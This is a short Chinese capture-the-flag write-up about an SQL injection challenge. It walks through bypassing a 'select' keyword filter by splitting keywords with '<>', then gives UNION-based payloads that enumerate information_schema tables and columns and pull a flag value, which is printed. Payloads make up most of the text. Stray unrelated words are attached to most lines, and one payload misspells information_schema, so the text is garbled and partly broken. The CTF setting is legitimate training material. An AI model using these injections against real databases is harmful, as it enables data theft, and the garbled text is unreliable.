題目提示SQL注入,打開源代碼發現<!--SELECT * FROM info WHERE id=1-->code
嘗試union select 1,2,3提示inj code!orm
通過屢次嘗試以後發現select已經被過濾,因而百度繞過select過濾的方法,/*!%53eLEct*/,發現依舊沒法繞過select過濾it
通過再次嘗試後發現能夠用<>進行繞過,因而構造payload un<>ion sel<>ect 1,2,3io
返回了一個2,說明第二個字段能夠顯示table
構建payload查詢表名 un<>ion sel<>ect 1,group_concat(table_name) ,3from information_shema.tables where table_schema=database()form
發現有info表百度
構建payload查詢字段 un<>ion sel<>ect 1,group_concat(column_name) ,3 from information_schema.columns where table_name=0x696e666f(info的16進制)select
發現有3個字段id,title,flAg_T5ZNdrmnio
構建payload獲取字段 un<>ion sel<>ect 1,group_concat(flAg_T5ZNdrm),3 from info方法
得到flag
flag{f24a0c69-ee21-47c8-b54d-60f7728c5e6e}